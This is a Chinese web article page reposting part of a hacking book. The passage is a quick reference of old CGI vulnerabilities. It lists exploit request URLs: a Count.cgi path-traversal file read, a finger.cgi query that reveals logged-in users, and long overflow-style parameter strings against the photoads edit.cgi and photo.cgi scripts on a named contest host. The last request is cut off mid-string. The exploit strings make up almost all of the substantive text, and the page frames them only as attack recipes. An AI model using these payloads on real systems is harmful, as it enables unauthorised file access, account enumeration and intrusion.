当前位置：傲看软件园 → 文章中心 → 电脑安全 → 安防技术

黑客攻防技术内幕-安全防入侵与防病毒基础(11)

减小字体

增大字体作者：风未起时来源：中国站长学院中国站长学院发布时间：2008-10-20 19:36:36

3.5 CGI及系统漏洞速查(2)

用Count.cgi看图片：

http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

● finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

● JFS

漏洞介绍：利用photoads这个CGI模块攻入主机，可以入侵PCWEEK-LINUX 主机，具体如下：

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name= 11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=

0&CityStPhone=0&Renewed=0"

创建新AD值绕过 $AdNum 的检查后用：

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111&DataFile=

1&Password=0&FILE_CONTENT=

文章评论评论内容只代表网友观点，与本站立场无关！

评论摘要(共 0 条，得分 0 分，平均 0 分) 查看完整评论

黑客攻防技术内幕-安全防入侵与防病毒基础(11)

Tags：

文章评论评论内容只代表网友观点，与本站立场无关！

精品栏目导航

栏目导航

本类热门阅览

相关文章